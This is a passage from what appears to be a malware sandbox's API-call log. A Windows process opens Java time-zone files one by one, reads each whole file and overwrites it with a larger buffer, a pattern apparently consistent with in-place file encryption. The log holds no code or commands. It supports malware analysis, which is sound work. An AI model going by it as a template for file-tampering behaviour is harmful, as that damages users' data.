dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0128.382] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x59 [0128.382] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0128.382] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0128.382] ReleaseMutex (hMutex=0x168) returned 1 [0128.382] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Maseru", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0128.382] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Maseru", cchWideChar=6, lpMultiByteStr=0x1f7accc, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Maseru", lpUsedDefaultChar=0x0) returned 6 [0128.382] ReadFile (in: hFile=0x204, lpBuffer=0x1fbab68, nNumberOfBytesToRead=0x59, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fbab68*, lpNumberOfBytesRead=0x311f2bc*=0x59, lpOverlapped=0x0) returned 1 [0128.384] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0128.384] WriteFile (in: hFile=0x204, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5e1, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x311f2d0*=0x5e1, lpOverlapped=0x0) returned 1 [0128.384] CloseHandle (hObject=0x204) returned 1 [0128.384] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Ouagadougou" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\ouagadougou"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0128.385] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0128.385] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x41 [0128.385] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0128.385] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0128.386] ReleaseMutex (hMutex=0x168) returned 1 [0128.386] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Ouagadougou", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0128.386] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Ouagadougou", cchWideChar=11, lpMultiByteStr=0x1f7340c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Ouagadougou", lpUsedDefaultChar=0x0) returned 11 [0128.386] ReadFile (in: hFile=0x204, lpBuffer=0x1fc21d8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fc21d8*, lpNumberOfBytesRead=0x311f2bc*=0x41, lpOverlapped=0x0) returned 1 [0128.387] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0128.387] WriteFile (in: hFile=0x204, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5c9, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x311f2d0*=0x5c9, lpOverlapped=0x0) returned 1 [0128.388] CloseHandle (hObject=0x204) returned 1 [0128.388] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Anguilla" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\anguilla"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0130.616] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0130.617] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x41 [0130.617] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0130.617] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0130.617] ReleaseMutex (hMutex=0x168) returned 1 [0130.617] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Anguilla", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0130.617] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Anguilla", cchWideChar=8, lpMultiByteStr=0x1f7366c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Anguilla", lpUsedDefaultChar=0x0) returned 8 [0130.617] ReadFile (in: hFile=0x204, lpBuffer=0x1fc21d8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fc21d8*, lpNumberOfBytesRead=0x311f2bc*=0x41, lpOverlapped=0x0) returned 1 [0130.618] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0130.619] WriteFile (in: hFile=0x204, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5c9, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x311f2d0*=0x5c9, lpOverlapped=0x0) returned 1 [0130.619] CloseHandle (hObject=0x204) returned 1 [0130.619] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Mendoza" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\mendoza"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0130.936] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0130.936] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x225 [0130.936] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0130.936] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0130.936] ReleaseMutex (hMutex=0x168) returned 1 [0130.936] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Mendoza", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0130.936] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Mendoza", cchWideChar=7, lpMultiByteStr=0x1f7ace4, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Mendoza", lpUsedDefaultChar=0x0) returned 7 [0130.938] ReadFile (in: hFile=0x1f0, lpBuffer=0x1f25a38, nNumberOfBytesToRead=0x225, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f25a38*, lpNumberOfBytesRead=0x311f2bc*=0x225, lpOverlapped=0x0) returned 1 [0130.939] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0130.939] WriteFile (in: hFile=0x1f0, lpBuffer=0x286cf78*, nNumberOfBytesToWrite=0x7ad, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesWritten=0x311f2d0*=0x7ad, lpOverlapped=0x0) returned 1 [0130.940] CloseHandle (hObject=0x1f0) returned 1 [0130.940] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Asuncion" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\asuncion"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0130.941] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0130.941] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x45c [0130.941] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0130.942] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0130.942] ReleaseMutex (hMutex=0x168) returned 1 [0130.942] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Asuncion", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0130.942] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Asuncion", cchWideChar=8, lpMultiByteStr=0x1f7340c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Asuncion", lpUsedDefaultChar=0x0) returned 8 [0130.942] ReadFile (in: hFile=0x1f0, lpBuffer=0x269c668, nNumberOfBytesToRead=0x45c, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x269c668*, lpNumberOfBytesRead=0x311f2bc*=0x45c, lpOverlapped=0x0) returned 1 [0130.985] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0130.985] WriteFile (in: hFile=0x1f0, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x9e4, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x311f2d0*=0x9e4, lpOverlapped=0x0) returned 1 [0130.986] CloseHandle (hObject=0x1f0) returned 1 [0130.986] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Boa_Vista" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\boa_vista"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0131.025] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0131.025] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x149 [0131.025] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0131.025] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0131.026] ReleaseMutex (hMutex=0x168) returned 1 [0131.026] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Boa_Vista", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0131.026] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Boa_Vista", cchWideChar=9, lpMultiByteStr=0x1f7362c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Boa_Vista", lpUsedDefaultChar=0x0) returned 9 [0131.026] ReadFile (in: hFile=0x1f0, lpBuffer=0x268b7c8, nNumberOfBytesToRead=0x149, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x268b7c8*, lpNumberOfBytesRead=0x311f2bc*=0x149, lpOverlapped=0x0) returned 1 [0131.027] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0131.027] WriteFile (in: hFile=0x1f0, lpBuffer=0x286cf78*, nNumberOfBytesToWrite=0x6d1, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesWritten=0x311f2d0*=0x6d1, lpOverlapped=0x0) returned 1 [0131.027] CloseHandle (hObject=0x1f0) returned 1 [0131.028] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Cayman" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\cayman"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0131.028] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0131.028] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x41 [0131.028] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0131.028] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0131.028] ReleaseMutex (hMutex=0x168) returned 1 [0131.029] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Cayman", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0131.029] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Cayman", cchWideChar=6, lpMultiByteStr=0x1f7ace4, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Cayman", lpUsedDefaultChar=0x0) returned 6 [0131.029] ReadFile (in: hFile=0x1f0, lpBuffer=0x1fc21d8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fc21d8*, lpNumberOfBytesRead=0x311f2bc*=0x41, lpOverlapped=0x0) returned 1 [0131.030] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0131.030] WriteFile (in: hFile=0x1f0, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5c9, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x311f2d0*=0x5c9, lpOverlapped=0x0) returned 1 [0131.030] CloseHandle (hObject=0x1f0) returned 1 [0131.030] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Dawson" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\dawson"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0131.031] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0131.031] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x454 [0131.031] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0131.031] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0131.031] ReleaseMutex (hMutex=0x168) returned 1 [0131.031] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dawson", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0131.031] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dawson", cchWideChar=6, lpMultiByteStr=0x1f7ace4, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Dawson", lpUsedDefaultChar=0x0) returned 6 [0131.031] ReadFile (in: hFile=0x1f0, lpBuffer=0x269cae8, nNumberOfBytesToRead=0x454, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x269cae8*, lpNumberOfBytesRead=0x311f2bc*=0x454, lpOverlapped=0x0) returned 1 [0131.055] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0131.055] WriteFile (in: hFile=0x1f0, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x9dc, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x311f2d0*=0x9dc, lpOverlapped=0x0) returned 1 [0131.055] CloseHandle (hObject=0x1f0) returned 1 [0131.055] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Fortaleza" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\fortaleza"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0131.063] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0131.063] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x179 [0131.063] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0131.063] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0131.063] ReleaseMutex (hMutex=0x168) returned 1 [0131.063] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Fortaleza", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0131.063] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Fortaleza", cchWideChar=9, lpMultiByteStr=0x1f7340c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Fortaleza", lpUsedDefaultChar=0x0) returned 9 [0131.063] ReadFile (in: hFile=0x1f0, lpBuffer=0x25be3f8, nNumberOfBytesToRead=0x179, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25be3f8*, lpNumberOfBytesRead=0x311f2bc*=0x179, lpOverlapped=0x0) returned 1 [0131.065] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0131.065] WriteFile (in: hFile=0x1f0, lpBuffer=0x286cf78*, nNumberOfBytesToWrite=0x701, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesWritten=0x311f2d0*=0x701, lpOverlapped=0x0) returned 1 [0131.065] CloseHandle (hObject=0x1f0) returned 1 [0131.065] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Guayaquil" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\guayaquil"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0131.066] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0131.066] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x41 [0131.066] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0131.066] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0131.066] ReleaseMutex (hMutex=0x168) returned 1 [0131.066] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Guayaquil", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0131.066] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Guayaquil", cchWideChar=9, lpMultiByteStr=0x1f7362c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Guayaquil", lpUsedDefaultChar=0x0) returned 9 [0131.067] ReadFile (in: hFile=0x1f0, lpBuffer=0x1fc21d8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fc21d8*, lpNumberOfBytesRead=0x311f2bc*=0x41, lpOverlapped=0x0) returned 1 [0131.068] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0131.068] WriteFile (in: hFile=0x1f0, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5c9, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x311f2d0*=0x5c9, lpOverlapped=0x0) returned 1 [0131.068] CloseHandle (hObject=0x1f0) returned 1 [0131.068] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Petersburg" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\petersburg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0131.069] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0131.069] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x3ec [0131.069] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0131.069] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0131.070] ReleaseMutex (hMutex=0x168) returned 1 [0131.070] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Petersburg", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0131.070] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Petersburg", cchWideChar=10, lpMultiByteStr=0x1f7340c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Petersburg", lpUsedDefaultChar=0x0) returned 10 [0131.070] ReadFile (in: hFile=0x1f0, lpBuffer=0x1e99938, nNumberOfBytesToRead=0x3ec, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e99938*, lpNumberOfBytesRead=0x311f2bc*=0x3ec, lpOverlapped=0x0) returned 1 [0131.474] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0131.475] WriteFile (in: hFile=0x1f0, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x974, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x311f2d0*=0x974, lpOverlapped=0x0) returned 1 [0131.475] CloseHandle (hObject=0x1f0) returned 1 [0131.476] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Juneau" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\juneau"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0131.477] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, 